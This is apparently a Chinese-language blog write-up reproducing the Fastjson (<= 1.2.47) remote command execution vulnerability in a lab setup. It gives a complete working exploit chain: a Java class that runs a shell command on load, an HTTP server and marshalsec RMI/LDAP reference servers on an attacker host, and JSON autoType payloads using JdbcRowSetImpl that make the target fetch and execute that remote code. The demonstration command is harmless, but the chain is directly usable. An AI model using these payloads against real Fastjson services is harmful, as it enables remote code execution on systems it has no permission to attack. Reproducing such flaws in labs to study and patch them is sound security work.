Fastjson远程命令执行漏洞

2020-06-06

漏洞安全 Fastjson

简介
漏洞复现-1
1. 启动靶机Fastjson环境
2. 攻击者环境
漏洞复现-2
1. 启动靶机Fastjson环境

简介

漏洞名称：Fastjson远程命令执行漏洞
漏洞影响：远程代码执行
影响版本：Fastjson <= 1.2.47

漏洞复现-1

启动靶机Fastjson环境

1	java -Dserver.address=0.0.0.0 -Dserver.port=8090 -jar fastjsondemo.jar

目标环境是jdk: 8u102，这个版本没有com.sun.jndi.rmi.object.trustURLCodebase的限制，我们可以简单利用RMI进行命令执行
如果不行可以采用LADP的方式

攻击者环境

编译远程执行代码

$ javac TouchFile.java
import java.lang.Runtime;
import java.lang.Process;
public class TouchFile {
    static {
        try {
            Runtime rt = Runtime.getRuntime();
            String[] commands = {"touch", "/tmp/success"};
            Process pc = rt.exec(commands);
            pc.waitFor();
        } catch (Exception e) {
            // do nothing
        }
    }
}

启动一个http环境，来下载上面的代码

1	python -m SimpleHTTPServer 80

启动marshalsec环境

通常RMI方式即可

# RMI方式
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.0.104/#TouchFile" 9999
# LDAP方式
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://192.168.0.104/#TouchFile" 9999

向靶场服务器发送Payload

# RMI
{
    "a":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://192.168.0.104:9999/Exploit",
        "autoCommit":true
    }
}
# LADP
{
    "a":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"ldap://192.168.0.104:9999/Exploit",
        "autoCommit":true
    }
}